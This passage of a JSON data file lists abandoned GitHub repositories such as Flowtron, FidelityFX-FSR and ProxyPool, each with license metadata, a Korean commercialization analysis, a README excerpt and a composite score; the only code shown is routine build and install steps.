NVIDIA/flowtron 평가 분석\n\n## 왜 보물인가\nNVIDIA가 만든 이 기술은 텍스트를 자연스러운 음성으로 변환하는 기술로, 콘텐츠 제작자나 기업들이 나레이션 비용을 대폭 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음성 나레이션 SaaS**: 유튜브 영상 제작자들이 구독으로 자동 나레이션 생성 및 다운로드\n2. **기업 내부 공","readme_excerpt":"![Flowtron](https://nv-adlr.github.io/images/flowtron_logo.png \"Flowtron\")\n\n## Flowtron: an Autoregressive Flow-based Network for Text-to-Mel-spectrogram Synthesis\n\n### Rafael Valle, Kevin Shih, Ryan Prenger and Bryan Catanzaro\n\nIn our recent [paper] we propose Flowtron: an autoregressive flow-based\ngenerative network for text-to-speech synthesis with control over speech\nvariation and style transfer. Flowtron borrows insights from Autoregressive Flows and revamps\n[Tacotron] in order to provide high-quality and expressive mel-spectrogram\nsynthesis. Flowtron is optimized by maximizing the likelihood of the training\ndata, which makes training simple and stable. Flowtron learns an invertible\nmapping of data to a latent space that can be manipulated to control many\naspects of speech synthesis (pitch, tone, speech rate, cadence, accent).\n\nOur mean opinion scores (MOS) show that Flowtron matches state-of-the-art TTS\nmodels in terms of speech quality. In addition, we provide results on control","composite_score":0.507,"license_safety_tag":"safe"},{"name":"GPUOpen-Effects/FidelityFX-FSR","github_url":"https://github.com/GPUOpen-Effects/FidelityFX-FSR","stars":5,"language":"C","license":"MIT","abandonment_months":49,"description":"# FidelityFX-FSR 분석 보고서\n\n## 왜 보물인가\n게임과 영상 편집 프로그램에서 저화질 이미지를 고화질로 자동 변환하는 기술로, 비용 대비 엄청난 화질 향상을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 게임 스트리밍 서비스**: 네트워크 대역폭을 줄이면서도 사용자에게 고화질로 게임을 제공하는 SaaS 플랫폼\n2. **실시간 영상","readme_excerpt":"# FidelityFX Super Resolution 1.0 (FSR) \n\nCopyright (c) 2021 Advanced Micro Devices, Inc. All rights reserved.\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF","composite_score":0.507,"license_safety_tag":"safe"},{"name":"Idnan/bash-guide","github_url":"https://github.com/Idnan/bash-guide","stars":5,"language":"","license":"MIT","abandonment_months":22,"description":"# Bash-Guide 상용화 분석\n\n## 왜 보물인가\n컴퓨터 초보자도 따라할 수 있는 명령어 학습 가이드로, 기술 진입장벽을 낮춰 새로운 학습자층을 확보할 수 있는 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 초보자용 프로그래밍 강좌 콘텐츠로 판매 (Udemy, Coursera 유사 모델)\n2. **기업 IT 온보딩 도","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://cloud.githubusercontent.com/assets/2059754/24601246/753a7f36-1858-11e7-9d6b-7a0e64fb27f7.png\" alt=\"bash logo\"/>\n</p>\n\n## Table of Contents\n  1. [Basic Operations](#1-basic-operations)  \n    1.1. [File Operations](#11-file-operations)  \n    1.2. [Text Operations](#12-text-operations)  \n    1.3. [Directory Operations](#13-directory-operations)  \n    1.4. [SSH, System Info & Network Operations](#14-ssh-system-info--network-operations)  \n    1.5. [Process Monitoring Operations](#15-process-monitoring-operations)\n  2. [Basic Shell Programming](#2-basic-shell-programming)  \n    2.1. [Variables](#21-variables)  \n    2.2. [Array](#22-array)  \n    2.3. [String Substitution](#23-string-substitution)  \n    2.4. [Other String Tricks](#24-other-string-tricks)  \n    2.5. [Functions](#25-functions)  \n    2.6. [Conditionals](#26-conditionals)  \n    2.7. [Loops](#27-loops)  \n    2.8. [Regex](#28-regex)  \n    2.9. [Pipes](#29-pipes)  \n  3. [Tricks](#3-tricks)  \n  4","composite_score":0.5069,"license_safety_tag":"safe"},{"name":"supabase/ui","github_url":"https://github.com/supabase/ui","stars":12,"language":"TypeScript","license":"MIT","abandonment_months":26,"description":"# Supabase UI 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 버튼, 입력창, 메뉴 등 기본 부품들을 모아놓은 실용적인 도구 모음이라 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구글 같은 업무용 클라우드 소프트웨어의 깔끔한 사용자 인터페이스를 빠르게 구축\n- **내부 업무 도구*","readme_excerpt":"# Supabase UI\n\nSupabase UI is a React UI library.\n\n---\n\n## Supabase UI is being deprecated. \n\nWe are moving the components to the main mono repo at [github.com/supabase/supabase](https://github.com/supabase/supabase).\n\nThe auth component has been moved to it's own repo and package.\n[github.com/supabase-community/auth-ui](https://github.com/supabase-community/auth-ui).\nYou can also read the [docs for auth ui here](https://supabase.com/docs/guides/auth/auth-helpers/auth-ui).\n\n---\n\n~~### ⚠️ Development is currently being worked on in [alpha](https://github.com/supabase/ui/tree/alpha) branch~~\n\n~~Supabase UI will be using tailwind css classes and dropping support for CSS modules is in the alpha branch.~~\n~~This UI library will exclusively need to be used with tailwind.~~\n\n~~The Auth component will be moved over to [@supabase/auth-helpers](https://github.com/supabase-community/supabase-auth-helpers).~~\n\n\n---\n\n🚧  Supabase UI is still a work-in-progress until a major release is published.\n\n[!","composite_score":0.5069,"license_safety_tag":"safe"},{"name":"thegooddocsproject/templates","github_url":"https://github.com/thegooddocsproject/templates","stars":7,"language":"HTML","license":"NOASSERTION","abandonment_months":45,"description":"# Good Docs Project Templates 분석\n\n## 왜 보물인가\n좋은 문서를 쉽게 만들 수 있도록 도와주는 실용적인 템플릿 모음으로, 회사나 프로젝트의 전문성을 빠르게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 문서화 서비스**: 고객사를 위해 전문적인 문서 템플릿을 제공하는 온라인 플랫폼\n2. **기업 내부 업무 도구*","readme_excerpt":"# About the Templates Repo\n\nThis repository contains best-practice templates to help build documentation for open-source software, which incidentally is directly applicable to other domains too.\n\nHere we provide tips for using these templates.\n\n\n## Core documentation types\n\nThe templates are categorized into three documentation types:\n\n**Concept**:\nDescribes how and why something works.\nConcepts answer the question \"what is it?\".\nWhen readers read concepts, they are learning about a topic.\nUse concepts to help the reader understand a technology, before they start using it.\n\n**Task**:\nGives specific instructions about how to get something done.\nTasks answer the question \"how do I do it?\".\nWhen readers read tasks, they are doing something.\nTasks tend to have a specific goal and consist of a set of numbered steps that the reader can follow to achieve that goal.\n\n**Reference**:\nContains structured information or specifications that users need to make a product work.\nReference material answ","composite_score":0.5069,"license_safety_tag":"unknown"},{"name":"murufeng/awesome_lightweight_networks","github_url":"https://github.com/murufeng/awesome_lightweight_networks","stars":12,"language":"Python","license":"MIT","abandonment_months":49,"description":"# awesome_lightweight_networks 평가 보고서\n\n## 왜 보물인가\n스마트폰이나 소형 기기에서도 빠르게 작동하는 인공지능 모델들을 모아놓은 라이브러리로, 배터리 소모를 줄이면서도 똑똑한 기능을 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 앱 SaaS 서비스**\n- 스마트폰 카메라로 실시간 물체 인식하는 앱 (예: 제","readme_excerpt":"# awesome_lightweight_networks\n\n![](https://img.shields.io/badge/awesome_lightweight_networks-v0.4.2-brightgreen)\n![](https://img.shields.io/badge/python->=v3.0-blue)\n![](https://img.shields.io/badge/pytorch->=v1.4-red)\n\n[![GitHub stars](https://img.shields.io/github/stars/murufeng/awesome_lightweight_networks.svg?style=social&label=Stars)](https://github.com/murufeng/awesome_lightweight_networks)\n[![GitHub forks](https://img.shields.io/github/forks/murufeng/awesome_lightweight_networks.svg?style=social&label=Forks)](https://github.com/murufeng/awesome_lightweight_networks)\n![visitors](https://visitor-badge.glitch.me/badge?page_id=murufeng/awesome_lightweight_networks) \n\n![](./figures/view.jpg)\n\n目前在深度学习领域主要分为两类，一派为学院派(Researcher)，研究强大、复杂的模型网络和实验方法，旨在追求更高的性能；\n另一派为工程派(Engineer)，旨在将算法更稳定、更高效的落地部署在不同硬件平台上。\n\n因此，针对这些移动端的算力设备，如何去设计一种高效且精简的网络架构就显得尤为重要。从2017年以来，已出现了很多优秀实用的轻量级网络架构，\n但是还没有一个通用的项目把这些网络架构进行集成起来。**本项目可以作为一个即插即用的工具包，通过直接调用就可以直接训练各种类型的网络**。\n\n目前该项目暂时支持在Cifar10/100,ImageNet数据集上进行实验。**后续会","composite_score":0.5068,"license_safety_tag":"safe"},{"name":"speedinghzl/pytorch-segmentation-toolbox","github_url":"https://github.com/speedinghzl/pytorch-segmentation-toolbox","stars":10,"language":"Python","license":"MIT","abandonment_months":76,"description":"# PyTorch 분할 도구상자 평가보고서\n\n## 왜 보물인가\n사진이나 영상에서 특정 물체를 자동으로 찾아내고 구분하는 인공지능 기술의 기초 도구를 누구나 쉽게 사용할 수 있도록 정리해놓은 것입니다.\n\n## 어디에 쓸 수 있나\n1. **의료 영상 분석 SaaS**: 병원과 진단 회사에 X-ray, CT 사진 분석 자동화 서비스 제공\n2. **드론 영상 처리","readme_excerpt":"# Pytorch-segmentation-toolbox [DOC](https://weiyc.github.io/assets/pdf/toolbox.pdf)\nPytorch code for semantic segmentation. This is a minimal code to run PSPnet and Deeplabv3 on Cityscape dataset.\nShortly afterwards, the code will be reviewed and reorganized for convenience.\n\n**The new version toolbox is released on branch [Pytorch-1.1](https://github.com/speedinghzl/pytorch-segmentation-toolbox/tree/pytorch-1.1) which supports Pytorch 1.0 or later and distributed multiprocessing training and testing**\n\n### Highlights of Our Implementations\n- Synchronous BN\n- Fewness of Training Time\n- Better Reproduced Performance\n\n### Requirements\n\nTo install PyTorch==0.4.0, please refer to https://github.com/pytorch/pytorch#installation. \n\n4 x 12g GPUs (e.g. TITAN XP) \n\nPython 3.6\n\n### Compiling\n\nSome parts of InPlace-ABN have a native CUDA implementation, which must be compiled with the following commands:\n```bash\ncd libs\nsh build.sh\npython build.py\n``` \nThe `build.sh` script assumes that the `nvc","composite_score":0.5068,"license_safety_tag":"safe"},{"name":"agavrel/42_CheatSheet","github_url":"https://github.com/agavrel/42_CheatSheet","stars":8,"language":"C","license":"unknown","abandonment_months":34,"description":"# 42_CheatSheet 상용화 분석\n\n## 왜 보물인가\n프로그래밍을 배우는 학생들이 자주 찾는 개념과 문법을 한 곳에 정리한 학습 자료로, 교육 시장에서 즉각적인 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 코딩 교육 SaaS**: 프로그래밍 입문자용 구독형 학습 플랫폼에 통합하여 월 9,900원대 부가 기능으로 판매\n2. **개발사","readme_excerpt":"# 42 School Cheat Sheet by [agavrel](https://www.github.com/agavrel)\n\n## :two_hearts: Intended for 42 alumni, current students and candidates\n\n> **Truth can only be found in one place: the code** – *Robert C. Martin, Clean Code: A Handbook of Agile Software Craftsmanship*\n\nA comprehensive guide to 50 years of evolution of strict C programming, a tribute to Dennis Ritchie's language\n\n---\n# Table of Content\n\n* **[0. About 42 School](#about-42-school)**\n    * **[0x00 ~ What is 42 School](#0x00--what-is-42-school)**\n    * **[0x01 ~ For Candidates: About the \"Piscine\"](#0x01--for-candidates-about-the-piscine)**    \n        * **[My guess on the success criteria](#coffee-my-guess-on-the-success-criteria)**  \n        * **[List of Essential Items](#star-list-of-essential-items)**  \n    * **[0x02 ~ Coding simple C programs](#0x02--coding-simple-c-programs)**  \n        * **[First by installing a C compiler on your computer](#first-by-installing-a-c-compiler-on-your-computer)**  \n\t\t* **[C Data Typ","composite_score":0.5068,"license_safety_tag":"unknown"},{"name":"aQuaYi/LeetCode-in-Go","github_url":"https://github.com/aQuaYi/LeetCode-in-Go","stars":11,"language":"Go","license":"MIT","abandonment_months":40,"description":"# LeetCode-in-Go 저장소 분석\n\n## 왜 보물인가\n프로그래밍 면접에 자주 나오는 실제 문제들을 Go 언어로 풀어놓은 학습 자료로, 개발자 취업 준비나 기술 면접 대비에 실질적인 도움을 줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 SaaS**: 면접 준비 수강생들을 위한 구독형 온라인 교육 플랫폼에 Go 언어 커리큘럼으로 통","readme_excerpt":"# [LeetCode](https://leetcode.com) 的 Go 解答\n\n[![LeetCode 排名](https://img.shields.io/badge/aQuaYi-646-blue.svg)](https://leetcode.com/aQuaYi/)\n[![codecov](https://codecov.io/gh/aQuaYi/LeetCode-in-Go/branch/master/graph/badge.svg)](https://codecov.io/gh/aQuaYi/LeetCode-in-Go)\n[![Build Status](https://www.travis-ci.org/aQuaYi/LeetCode-in-Go.svg?branch=master)](https://www.travis-ci.org/aQuaYi/LeetCode-in-Go)\n [![Go](https://img.shields.io/badge/Go-1.13-blue.svg)](https://golang.google.cn)\n\n## 进度\n\n> 统计规则：1.免费题，2.算法题，3.能提交 Go 解答\n\n|     |Easy|Medium|Hard|Total|\n|:---:|:---:|:---:|:---:|:---:|\n|**Accepted**|265|456|187|908|\n|**Total**|267|472|197|936|\n\n## 题解\n\n|题号|题目|通过率|难度|收藏|\n|:-:|:-|:-: | :-: | :-: |\n|[1250](https://leetcode.com/problems/check-if-it-is-a-good-array/)| * Check If It Is a Good Array|46%|Hard||\n|[1249](https://leetcode.com/problems/minimum-remove-to-make-valid-parentheses/)| * Minimum Remove to Make Valid Parentheses|55%|Medium||\n|[1248](https://leetcode.com/problems/count-numb","composite_score":0.5068,"license_safety_tag":"safe"},{"name":"zmops/zeus-iot","github_url":"https://github.com/zmops/zeus-iot","stars":11,"language":"Java","license":"Apache-2.0","abandonment_months":34,"description":"# Zeus IoT 저장소 분석\n\n## 왜 보물인가\n집에 있는 수많은 기계들(에어컨, 냉장고, 조명 등)을 한 곳에서 쉽게 관리할 수 있는 중앙 제어 시스템입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 스마트홈 관리 SaaS**\n아파트나 주택의 모든 전자기기를 휴대폰 앱으로 제어하고 에너지 사용량을 모니터링하는 구독 서비스로 운영할 수 있습니다.\n\n**2.","readme_excerpt":"<p align=\"center\">\n<img src=\"docs/images/zeus-iot-logo.png\" alt=\"banner\" width=\"200px\">\n</p>\n\n<p align=\"center\">\n<b>Zeus IoT is the world's first open source IoT <i>distributed collection platform</i> based on Zabbix</b>\n</p>\n\n----\n\n[![GitHub stars](https://img.shields.io/github/stars/zmops/zeus-iot.svg?label=Stars&logo=github)](https://github.com/zmops/zeus-iot)\n[![GitHub issues](https://img.shields.io/github/issues/zmops/zeus-iot?label=Issuess&logo=github)](https://github.com/zmops/zeus-iot)\n[![GitHub forks](https://img.shields.io/github/forks/zmops/zeus-iot?label=Forks&logo=github)](https://github.com/zmops/zeus-iot)\n![Version](https://img.shields.io/badge/version-1.0.0--BETA-brightgreen)\n[![QQ群736541577](https://img.shields.io/badge/QQ群-736541577-brightgreen)](https://qm.qq.com/cgi-bin/qm/qr?k=CcWBdkXjkgt99bBu5d_-1TeS36DhCkU4&jump_from=webapi)\n\n## Abstract\n[Zeus IoT](https://www.zmops.com/) is a **distributed IoT collection, analysis, and storage platform**,It is the world's first ","composite_score":0.5068,"license_safety_tag":"safe"},{"name":"SVCE-ACM/A-December-of-Algorithms-2019","github_url":"https://github.com/SVCE-ACM/A-December-of-Algorithms-2019","stars":104,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"","readme_excerpt":"<div align=\"left\">\n<h1>\n    <img alt=\"header\" src=\"/src/assets/Header.png\" width=\"800\"></img>\n</h1>\nWelcome to A December of Algorithms (2019). After the overwhelming response from last year, we present you with a new collection of algorithms to implement this December. Each Day, Each Algorithm ;) Finish them all to get prizes and certificate :)\n\n**Send a pull request only after completing all 31 algorithms.**\n\n**Please submit all PRs on or before January 10th 11:59 PM IST.**\n\n## What Do I Do?\nWe have a small collection of algorithms, one for every day of the month. Scroll down to take a look at them. All you need to do is fork this repository, implement all 31  algorithms and send a pull request over to us. Check out our FAQ for more information.\n\n\n\n## Index\n  - [**December 1 - Sevenish Number**](#december-1---sevenish-number)\n  - [**December 2 - Is this a valid credit card number?**](#december-2---is-this-a-valid-credit-card-number)\n  - [**December 3 - The Decimation**](#december-3--","composite_score":0.5067,"license_safety_tag":"safe"},{"name":"fengzhizi715/ProxyPool","github_url":"https://github.com/fengzhizi715/ProxyPool","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":82,"description":"# ProxyPool 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 정보를 수집할 때 필요한 '중계 서버'를 자동으로 찾아주고 관리해주는 도구로, 많은 기업의 데이터 수집 작업을 효율적으로 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 크롤링 API 플랫폼 제공 (고객이 웹사이트 정보 자동 수집 가능)\n- **내부 업무 도구**: ","readme_excerpt":"# ProxyPool\n\n[![@Tony沈哲 on weibo](https://img.shields.io/badge/weibo-%40Tony%E6%B2%88%E5%93%B2-blue.svg)](http://www.weibo.com/fengzhizi715)\n [ ![Download](https://api.bintray.com/packages/fengzhizi715/maven/proxypool/images/download.svg) ](https://bintray.com/fengzhizi715/maven/proxypool/_latestVersion)\n[![License](https://img.shields.io/badge/license-Apache%202-lightgrey.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)\n\n\n+ ProxyPool的作用：从网络上获取免费可用的IP代理数据。先用爬虫程序抓取代理数据，再检查代理是否可用，可用的话就存放到数据库中。每隔一段时间重复执行这个过程。\n\n+ ProxyPool的技术：Spring Boot+RxJava2.x+MongoDB等，前端：layUI+jquery 等\n\n+ ProxyPool的概述：该项目有两个模块proxypool和proxypool-web，从网络上抓取数据的核心工作由proxypool模块完成，可以在site这个package下新增针对不同网页的解析类。proxypool-web模块是依赖proxypool模块实现的sample模块。\n\n## 1. 使用方法\n+ #### 单独使用ProxyPool项目中proxypool模块的抓取逻辑，它无任何界面，可用于任何项目，无侵入性\n\n对于Java工程如果使用gradle构建，由于默认没有使用jcenter()，需要在相应module的build.gradle中配置\n```groovy\nrepositories {\n    mavenCentral()\n    jcenter()\n}\n```\nGradle:\n\n```groovy\ncompile 'com.cv4j.proxy:proxypool:1.1.13'\n```","composite_score":0.5067,"license_safety_tag":"safe"},{"name":"InoriRus/Kyty","github_url":"https://github.com/InoriRus/Kyty","stars":13,"language":"C++","license":"MIT","abandonment_months":25,"description":"# Kyty 저장소 분석\n\n## 왜 보물인가\nGitHub 정보만으로는 프로젝트의 실제 목적과 기능이 명확하지 않아, 숨겨진 가치를 판단하기 어렵습니다.\n저장소 설명이 없고 최근 활동이 8개월 전이어서 현재 개발 상태를 파악할 수 없습니다.\n프로젝트명 \"Kyty\"의 의미와 용도를 먼저 확인해야 평가가 가능합니다.\n\n## 어디에 쓸 수 있나\n**정보 부족으로 ","readme_excerpt":"[![Build status](https://ci.appveyor.com/api/projects/status/0du32fg9flol63to?svg=true)](https://ci.appveyor.com/project/InoriRus/kyty) [![CI](https://github.com/InoriRus/Kyty/actions/workflows/ci.yml/badge.svg)](https://github.com/InoriRus/Kyty/actions/workflows/ci.yml)\n\n# Kyty\n## PS4 & PS5 emulator\n\n---\nThe project is in its early stage.\n\n[Vladimir M](mailto:inorirus@gmail.com)\n\nLicensed under the MIT license.\n\n---\nIt is possible to run some simple games for PS4 and homebrews for PS5\n\nThere maybe graphics glitches, crashes, freezes and low FPS. It's OK for now.\n\nFeatures that are not implemented:\n- Audio input/output\n- MP4 video\n- Network\n- Multi-user\n\nPath to Savedata folder is hardcoded and can't be configured.\nSystem parameters (language, date format, etc.) are also hardcoded.\n\n---\n### Screenshots\n#### PS4\n<img src=\"https://user-images.githubusercontent.com/7149418/169674296-4185e2da-99f9-4073-8ca9-19dc124c7459.png\" width=\"400\"> <img src=\"https://user-images.githubusercontent.com/","composite_score":0.5067,"license_safety_tag":"safe"},{"name":"WorldDbs/specs-actors","github_url":"https://github.com/WorldDbs/specs-actors","stars":19,"language":"Go","license":"NOASSERTION","abandonment_months":61,"description":"# WorldDbs/specs-actors 분석\n\n## 왜 보물인가\n블록체인 기술의 핵심 구조를 정의한 기술 문서로, 분산 네트워크를 구축하려는 기업들이 필수적으로 참고해야 하는 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 인프라 SaaS**: 기업용 분산 데이터베이스 서비스로 패키징하여 월 구독료 수취\n2. **암호화폐 거래소 API**: 이","readme_excerpt":"# world database\n\n## Versioning\n\nReleases of this repo follow semantic versioning rules, with consideration of distributed state machines.\n- The major version will remain `0` or `1` for the forseeable future. \n  We do not bump the major version every time there's a backwards-incompatible change in state machine evaluation, \n  or actor interfaces, because this interacts very poorly with Go's module resolution, \n  requiring a change of all import paths.\n  After `1.0` we may consider using the major version number to version the `Runtime` interface, which is the link between\n  the actors and the system in which they are embedded.\n- A minor version change indicates a backwards-incompatible change in the state machine evaluation, including\n  actor exported methods or constant values, while retaining compatibility of the `Runtime` interface.\n  This means that the same sequence of messages might produce different states at two different versions.\n  In a blockchain, this would usually require ","composite_score":0.5066,"license_safety_tag":"unknown"},{"name":"RedPill-TTG/redpill-lkm","github_url":"https://github.com/RedPill-TTG/redpill-lkm","stars":5,"language":"C","license":"GPL-3.0","abandonment_months":44,"description":"# RedPill-TTG/redpill-lkm 분석\n\n## 왜 보물인가\n특정 운영체제의 보안 커널을 수정하는 매우 전문화된 도구로, 시스템 깊은 수준의 제어가 필요한 기업들에게 높은 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **시스템 통제 솔루션 SaaS**: 대규모 데이터센터 운영사들이 서버 운영체제를 세밀하게 관리하는 클라우드 서비스로 패키","readme_excerpt":"# 💊 RedPill LKM\n\n---\n\n## THIS IS WORK IN PROGRESS\nThere's nothing to run/see here (yet ;)).\n\n---\n\n## What is this?\nThis is a major part of a tool which will be able to run a DSM instance for research purposes without\nengaging your real DS machine and risking your data in the process (ask me how I know...).\n\n## Target audience\nThis repository is target towards **developers** willing to learn and help with implementation of peculiarities of \nSynology's DSM Linux distribution.\n\nRead about the quirk in a separate repo: https://github.com/RedPill-TTG/dsm-research/tree/master/quirks\n\n## How to build with Linux sources?\n1. You need Synology's GPL sources for the kernel. Check the [Makefile](Makefile) for details\n2. `cd` to kernel sources\n3. Depending on the version:  \n   - **Linux v3**\n      - `cp synoconfigs/bromolow .config`\n   - **Linux v4**\n      - `cp synoconfigs/apollolake .config`\n      - `echo '+' > .scmversion` (otherwise it will error-out loading modules)\n4. `make oldconfig ; make m","composite_score":0.5066,"license_safety_tag":"restricted"},{"name":"SparkPost/heml","github_url":"https://github.com/SparkPost/heml","stars":11,"language":"JavaScript","license":"MIT","abandonment_months":77,"description":"# SparkPost/heml 분석 보고서\n\n## 왜 보물인가\n이메일을 만드는 복잡한 과정을 간단하게 해주는 도구로, 마케팅이나 알림 메시지를 자주 보내는 회사들이 매우 원하는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 이메일 마케팅 플랫폼이 이 기술을 탑재해 고객이 쉽게 멋진 이메일을 만들도록 지원\n- **내부 업무 도구**: 대","readme_excerpt":"<h1 align=\"center\">&lt;heml&gt;</h1>\n\n\n<p align=\"center\">\n  <a href=\"https://heml.io/docs/getting-started/guide\">Guide</a> &bull;\n  <a href=\"https://heml.io/docs\">Documentation</a> &bull;\n  <a href=\"https://heml.io/editor\">Editor</a>\n</p>\n\n\nHEML is an open source markup language for building responsive email.\n\n- **Native Feel:** Do you know HTML and CSS? Check out our docs and you're off to the races! No special rules or styling paradigms to master.\n\n- **Forward Thinking:** HEML is designed to take advantage of all that email can do while still providing a solid experience for all clients.\n\n- **Extendable:** You can create your own powerful elements and style rules. Share them with the world, or keep them to yourself. Your choice.\n\n\n## FAQ\n\n### Why should I use HEML?\n\nIt makes building emails easier.\n\n### How do I use it?\n\nCheck out our [usage guide](http://heml.io/docs/getting-started/usage).\n\n### What do I do if I found a bug?\n\nOpen up an [issue](https://github.com/SparkPost/heml/iss","composite_score":0.5066,"license_safety_tag":"safe"},{"name":"pkwenda/new-bee","github_url":"https://github.com/pkwenda/new-bee","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":51,"description":"# new-bee 프로젝트 분석\n\n## 왜 보물인가\n작은 규모지만 MIT 라이선스로 자유롭게 사용할 수 있는 오픈소스 프로젝트로, 누구나 이를 기반으로 새로운 서비스를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 코드를 개선해 온라인 웹 애플리케이션으로 만들어 구독료를 받으며 판매\n2. **내부 업무 도구**: 회사 직원","readme_excerpt":"\n<p align=\"center\"><a href=\"https://github.com/java-webbee/webBee\" target=\"_blank\"><img width=\"300\"src=\"https://github.com/pkwenda/picture/blob/master/new_bee/ezgif-4-05f4bba41fef.gif\"></a></p>\n \n<p align=\"center\"><span style=\"font-size:50px\">new-bee - 有格调的论坛</span></p>\n \n \n <p align=\"center\">\n  <a href=\"https://github.com/pkwenda/new-bee/blob/master/LICENSE\"><img src=\"https://img.shields.io/badge/license-MIT-4EB1BA.svg?style=flat-square\" alt=\"Build Status\"></a>\n  <a href=\"https://travis-ci.org/pkwenda/new-bee\"><img src=\"https://travis-ci.org/pkwenda/new-bee.svg?branch=master\" alt=\"Coverage Status\"></a>\n   \n</p>\n\n## 请配合： https://niubility.me/431164c984ab4cd6959a525adda468a1  食用\n \n\n- 基于`nodeJs` `vue` `java` `spring-boot` `docker` 开发的一款 `bbs`\n- 如果觉得不错 给个`star` 支持一下 🤓\n- [ 项目的意义在哪？](https://github.com/pkwenda/blog/issues/9)\n- [ 项目随着《如何从零构建前后分离项目》同步更新](https://github.com/pkwenda/blog/)\n- 因为写文章需要大量的时间，随着这些文章的完成，抽出时间逐渐做一些实战性的贡献\n \n\n## 如何启动和部署\n- [开发者如何启动项目](https://github.com/pkwenda/new-bee/wi","composite_score":0.5066,"license_safety_tag":"safe"},{"name":"uohzxela/clean-code-ruby","github_url":"https://github.com/uohzxela/clean-code-ruby","stars":7,"language":"Ruby","license":"MIT","abandonment_months":45,"description":"# Clean Code Ruby 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 읽기 좋은 코드를 작성하는 방법을 배울 수 있는 교육 자료로, 소프트웨어 품질을 개선하려는 기업들에게 가치 있는 참고자료입니다.\n\n## 어디에 쓸 수 있나\n- **개발 교육 플랫폼 SaaS**: 신입 개발자 교육 콘텐츠나 코딩 부트캠프의 커리큘럼에 활용\n- **코드 검수 도구**","readme_excerpt":"# clean-code-ruby\n\nClean Code concepts adapted for Ruby.\n\nInspired by [clean-code-javascript](https://github.com/ryanmcdermott/clean-code-javascript).\n\n*Note: The examples are largely ported over from JavaScript so they may not be idiomatic. Feel free to point out any non-idiomatic Ruby code by submitting an issue and I'll correct it right away. Also, pull requests are always welcome!*\n\n## Table of Contents\n  1. [Introduction](#introduction)\n  2. [Variables](#variables)\n  3. [Methods](#methods)\n  4. [Objects and Data Structures](#objects-and-data-structures)\n  5. [Classes](#classes)\n  6. [SOLID](#solid)\n  7. [Testing](#testing)\n  9. [Error Handling](#error-handling)\n  10. [Formatting](#formatting)\n  11. [Comments](#comments)\n  12. [Translations](#translations)\n\n## Introduction\n![Humorous image of software quality estimation as a count of how many expletives\nyou shout when reading code](http://www.osnews.com/images/comics/wtfm.jpg)\n\nSoftware engineering principles, from Robert C. Martin","composite_score":0.5066,"license_safety_tag":"safe"},{"name":"zhunzhong07/Random-Erasing","github_url":"https://github.com/zhunzhong07/Random-Erasing","stars":21,"language":"Python","license":"Apache-2.0","abandonment_months":31,"description":"# Random-Erasing 기술 분석\n\n## 왜 보물인가\n사진에서 일부를 임의로 지우는 방식으로 AI 모델을 더 똑똑하게 학습시키는 간단하지만 효과적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 감시 SaaS**: CCTV 영상에서 사람을 인식하는 AI 서비스에 적용하여 부분적으로 가려진 사람도 정확히 감지\n2. **자동차 제조 내부 도구**","readme_excerpt":"# Random Erasing Data Augmentation\n===============================================================\n\n![Examples](all_examples-page-001.jpg)\n\n| black  | white | random |\n|----------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------|\n|![i1](img/001-black.gif)|![i2](img/001-white.gif)| ![i3](img/001-random.gif)|\n|![i4](img/002-black.gif)|![i5](img/002-white.gif)| ![i6](img/002-random.gif)|\n\n### This code has the source code for the paper \"[Random Erasing Data Augmentation](https://arxiv.org/abs/1708.04896)\".\n\nIf you find this code useful in your research, please consider citing:\n\n    @inproceedings{zhong2020random,\n    title={","composite_score":0.5066,"license_safety_tag":"safe"},{"name":"Maronato/vue-toastification","github_url":"https://github.com/Maronato/vue-toastification","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":27,"description":"# vue-toastification 상품화 분석\n\n## 왜 보물인가\n웹사이트에서 사용자에게 알림 메시지를 보여주는 기능을 간단하게 만들어주는 도구로, 수천 개의 프로젝트에서 이미 검증된 안정적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회계 관리 SaaS에서 \"송금 완료\", \"오류 발생\" 같은 실시간 피드백을 사용자에게 표시","readme_excerpt":"# 